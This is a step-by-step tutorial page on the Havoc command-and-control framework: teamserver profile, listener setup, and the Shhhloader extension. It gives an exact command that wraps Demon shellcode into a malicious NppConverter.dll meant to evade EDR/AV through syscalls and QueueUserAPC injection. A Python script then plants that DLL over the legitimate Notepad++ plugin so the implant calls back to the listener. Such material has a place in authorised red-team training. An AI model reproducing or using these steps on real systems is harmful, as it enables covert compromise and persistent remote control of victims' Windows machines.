Book of VanLuong
Practical with Havoc Framework

Teamserver Configuration

The teamserver needs a configuration profile that defines its bind address, port, operators and their passwords, the cross-compilers used to build payloads and the Demon defaults. Havoc profiles use the .yaotl format (an HCL-like syntax with `Key = value` lines and `{ }` blocks), not YAML.

Create the configuration profile.

  • Havoc ships a default profile at profiles/havoc.yaotl in the repository root; edit it, or create a new file next to it, with the content below. The Build paths are relative to the Havoc root, which is where the teamserver is started from.

Two values worth changing before the server is exposed: the operator password shown here is a placeholder and should be replaced with a long random one, and Host = "0.0.0.0" binds on every interface, so port 40056 must be firewalled to operator addresses (or a VPN) so that only the client, never the internet, can reach the teamserver. Leave TrustXForwardedFor = false unless the teamserver sits behind a redirector that sets the X-Forwarded-For header; otherwise a Demon could spoof its source address in the client view.

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# this is optional. if you dont use it you can remove it.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 2
    Jitter = 15

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Start Teamserver

Run the teamserver from the Havoc root with the profile (-v prints verbose output):

./havoc server --profile profiles/havoc.yaotl -v
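The profile above is plain text in Havoc's yaotl syntax, so it can be checked before the teamserver is started. The following Python script is an added example, not part of Havoc: it parses the subset of yaotl used in this profile (key = value lines and nested, optionally labelled blocks such as `user "at19n" { }`) and then flags the settings an operator should not leave at the values shown on this page: the all-interfaces bind, the default port 40056, the short operator password and a two-second sleep. The 16-character and 30-second thresholds and the weak-password list are assumptions made for the example; the embedded profile is a constructed copy of the one above.

```python
"""Sanity-check a Havoc teamserver profile (.yaotl) before starting the server.

Added example, not part of the Havoc project: a parser for the yaotl subset
used in the profile on this page plus lint rules for the settings that should
not go live as shown.
"""
import re
import secrets
import string

# Constructed copy of the profile shown on this page (same values).
SAMPLE_PROFILE = r'''
Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# optional Service block left out here

Demon {
    Sleep = 2
    Jitter = 15
    TrustXForwardedFor = false
    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}
'''

# Tokens of the yaotl subset: quoted string, integer, identifier, { } =, or a # comment.
TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|\d+|[A-Za-z_][A-Za-z0-9_]*|[{}=]|#[^\n]*')

# Assumed list for the example; extend with your own banned passwords.
WEAK_PASSWORDS = {"password", "p@ssw0rd", "havoc", "admin", "changeme"}


def tokenize(text):
    """Split profile text into tokens, dropping comments."""
    return [t for t in TOKEN_RE.findall(text) if not t.startswith("#")]


def _value(tok):
    if tok.startswith('"'):
        return tok[1:-1]
    if tok.isdigit():
        return int(tok)
    if tok in ("true", "false"):
        return tok == "true"
    return tok


def parse(tokens, i=0):
    """Recursive-descent parse of `Key = value` lines and `Name ["label"] { ... }` blocks.

    Returns (dict, next_index). A labelled block such as `user "at19n" { }`
    becomes node["user"]["at19n"].
    """
    node = {}
    while i < len(tokens):
        tok = tokens[i]
        if tok == "}":
            return node, i + 1
        if i + 1 < len(tokens) and tokens[i + 1] == "=":
            node[tok] = _value(tokens[i + 2])
            i += 3
            continue
        i += 1
        label = None
        if tokens[i].startswith('"'):
            label = _value(tokens[i])
            i += 1
        if tokens[i] != "{":
            raise ValueError(f"expected '{{' after block {tok!r}")
        child, i = parse(tokens, i + 1)
        if label is None:
            node[tok] = child
        else:
            node.setdefault(tok, {})[label] = child
    return node, i


def load_profile(text):
    cfg, _ = parse(tokenize(text))
    return cfg


def lint_profile(text, min_sleep=30):
    """Return a list of findings; an empty list means every rule passed.

    min_sleep (seconds) is an example threshold, not a Havoc setting.
    """
    cfg = load_profile(text)
    findings = []
    ts = cfg.get("Teamserver", {})
    if ts.get("Host") == "0.0.0.0":
        findings.append("Teamserver.Host = 0.0.0.0 listens on every interface; "
                        "bind to the management/VPN address or firewall the teamserver port")
    if ts.get("Port") == 40056:
        findings.append("Teamserver.Port is the Havoc default 40056, an easy fingerprint for scanners")
    for name, op in cfg.get("Operators", {}).get("user", {}).items():
        pw = str(op.get("Password", ""))
        if len(pw) < 16 or pw.lower() in WEAK_PASSWORDS:
            findings.append(f"operator {name!r} has a weak password; generate one with suggest_password()")
    demon = cfg.get("Demon", {})
    if demon.get("Sleep", 0) < min_sleep:
        findings.append(f"Demon.Sleep = {demon.get('Sleep')}s beacons very often; "
                        "raise it (and keep Jitter) for anything but a lab")
    return findings


def suggest_password(length=24):
    """Random operator password from the secrets module."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_"
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for finding in lint_profile(SAMPLE_PROFILE):
        print("[!]", finding)
    print("suggested operator password:", suggest_password())
```

To check your own file, pass `Path("profiles/havoc.yaotl").read_text()` to `lint_profile()`; the parser only handles the constructs that appear in the profile above (strings, integers, booleans and blocks), which is all the teamserver profile needs.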

Start Client

The client is the graphical interface used to interact with the teamserver.

From the folder client/build, run the client binary (from the Havoc root the equivalent documented command is `./havoc client`) and log in with the teamserver address, port and one of the operator accounts from the profile:

Setup Listener

A listener is the endpoint that receives connections from the agents (Demons) running on the target machines.

In the client, open Listeners and create a new listener.

Example HTTPS listener configuration:

  • Name: at19n-test

  • Type: HTTPS

  • Host: IP address of the teamserver or, preferably, of a redirector, so the Demon never learns the teamserver address

  • Port: 443

  • Callback interval: time between check-ins (example: 5 s); the Sleep and Jitter values in the profile's Demon block set the default used when payloads are generated

Save and start the listener. On success its status shows "Active".

Hands on

Install Extensions

Extensions list

Click Install: the Havoc client clones the Shhhloader source from GitHub into data/extensions/Shhhloader (the path used by the command later on this page).

Description: Shhhavoc is the Shhhloader integration for Havoc. It wraps the Demon shellcode in a loader that uses injection techniques intended to evade EDR/AV.

Features:

  • Syscalls via SysWhispers2, SysWhispers3 or GetSyscallStub (the -sc option), so the loader does not call ntdll exports that EDR has hooked in user mode

  • Injection methods including PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC and ProcessHollow (the -m option)

  • Options to encode the shellcode and to sign the output with a code-signing certificate

Hands on

Create shellcode

Generate the Demon shellcode from the client's payload generator, selecting the listener created above and the shellcode output format. The resulting file is referred to as demon.x64.bin in the next step.

Create and deployment Payload with Shhhloader

Use Shhhloader to wrap the demon.x64.bin shellcode in a proxy of the legitimate NppConverter.dll (a Notepad++ plugin).

Purpose:

  • Build a malicious NppConverter.dll that carries the shellcode and connects back to the Havoc listener.

  • Notepad++ loads this DLL on startup (DLL side-loading); the loader then runs the shellcode through QueueUserAPC.

  • On the Windows machine, replace the legitimate NppConverter.dll with the malicious one so the payload runs the next time Notepad++ starts. Keep the original DLL: a proxy DLL forwards the plugin's real exports to it, so it must stay in the plugin folder under the name the generated proxy expects, and you need it to restore the machine after the engagement.

/usr/bin/python3 /root/Havoc/data/extensions/Shhhloader/Shhhloader.py /root/share/demon.x64.bin -sc GetSyscallStub -m QueueUserAPC -o /root/share/NppConverter.dll -dp NppConverter.dll -pp explorer.exe -p notepad++.exe
  • /root/share/demon.x64.bin: path to the Demon shellcode generated above

  • -sc GetSyscallStub: resolve syscalls with GetSyscallStub instead of calling hooked ntdll exports

  • -m QueueUserAPC: inject the shellcode with QueueUserAPC

  • -o /root/share/NppConverter.dll: write the output as NppConverter.dll (the malicious DLL)

  • -dp NppConverter.dll: build the output as a proxy of the legitimate NppConverter.dll

  • -pp explorer.exe: use explorer.exe as the parent process of the spawned target

  • -p notepad++.exe: inject the shellcode into notepad++.exe

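Swapping the plugin DLL by hand is where a target tends to be left broken, so here is the deployment step as an added Python example, not part of Shhhloader or Havoc: it keeps the legitimate NppConverter.dll next to the proxy, verifies both copies by SHA-256, refuses to overwrite an existing backup, and restores the original for clean-up. The backup name NppConverter.dll.orig and the plugin folder used in demo() are assumptions; check the generated proxy's export table for the file name it forwards to and pass that as original_name, otherwise Notepad++ loses the converter plugin's functions.

```python
"""Stage the Shhhloader proxy DLL in place of the legitimate NppConverter.dll.

Added example (not part of Shhhloader or Havoc). The original is kept next to
the proxy under `original_name`, both copies are verified by SHA-256, and
restore_original() undoes the swap after the engagement.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def stage_proxy_dll(plugin_dir, proxy_dll, target_name="NppConverter.dll",
                    original_name="NppConverter.dll.orig"):
    """Replace plugin_dir/target_name with proxy_dll.

    original_name is an assumption: use the name the generated proxy forwards
    its exports to. Returns (hash of the legitimate DLL, hash of the staged
    proxy). Refuses to run twice without a restore so the legitimate DLL is
    never overwritten.
    """
    plugin_dir = Path(plugin_dir)
    target = plugin_dir / target_name
    original = plugin_dir / original_name
    if not target.is_file():
        raise FileNotFoundError(f"{target} not found; is the plugin installed?")
    if original.exists():
        raise RuntimeError(f"{original} already exists; run restore_original() first")
    shutil.copy2(target, original)        # keep the legitimate DLL for forwarding and clean-up
    shutil.copy2(proxy_dll, target)       # drop the proxy under the name Notepad++ loads
    staged = sha256(target)
    if staged != sha256(proxy_dll):
        raise RuntimeError("staged DLL does not match the proxy; aborting")
    return sha256(original), staged


def restore_original(plugin_dir, target_name="NppConverter.dll",
                     original_name="NppConverter.dll.orig"):
    """Put the legitimate DLL back, remove the backup and return its hash."""
    plugin_dir = Path(plugin_dir)
    original = plugin_dir / original_name
    target = plugin_dir / target_name
    if not original.is_file():
        raise FileNotFoundError(f"no backup at {original}")
    shutil.copy2(original, target)
    if sha256(target) != sha256(original):
        raise RuntimeError("restore verification failed")
    original.unlink()
    return sha256(target)


def demo():
    """Run the swap against a constructed plugin folder (fake DLL bytes, not real PEs)."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "plugins" / "NppConverter"   # assumed layout for the example
        plugins.mkdir(parents=True)
        (plugins / "NppConverter.dll").write_bytes(b"LEGIT-DLL")      # constructed stand-in
        proxy = Path(tmp) / "NppConverter.dll"
        proxy.write_bytes(b"PROXY-DLL-WITH-DEMON")                    # constructed stand-in
        legit_hash, proxy_hash = stage_proxy_dll(plugins, proxy)
        if (plugins / "NppConverter.dll").read_bytes() != b"PROXY-DLL-WITH-DEMON":
            raise RuntimeError("proxy was not staged")
        restored_hash = restore_original(plugins)
        return legit_hash, proxy_hash, restored_hash


if __name__ == "__main__":
    legit, proxy, restored = demo()
    print("legitimate:", legit)
    print("staged proxy:", proxy)
    print("restored matches original:", restored == legit)
```

On the target, call stage_proxy_dll() with the real Notepad++ plugin folder and the NppConverter.dll produced by the Shhhloader command above, then start notepad++.exe; record the two hashes in the engagement log so the restore can be verified later.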
Hands on

Source Video

The hands-on steps above are recorded in the following clips:

  • khoidong-teamserver.mp4 (starting the teamserver)
  • profiles.mp4 (profile configuration)
  • khoidong-client.mp4 (starting the client)
  • thietlap-listener.mp4 (setting up the listener)
  • caidat-extensions.mp4 (installing extensions)
  • desployment_havoc_c2_shhhloader.mp4 (deploying the payload with Shhhloader)
  • payload_c2.mp4 (payload and C2 session)

Last updated 1 month ago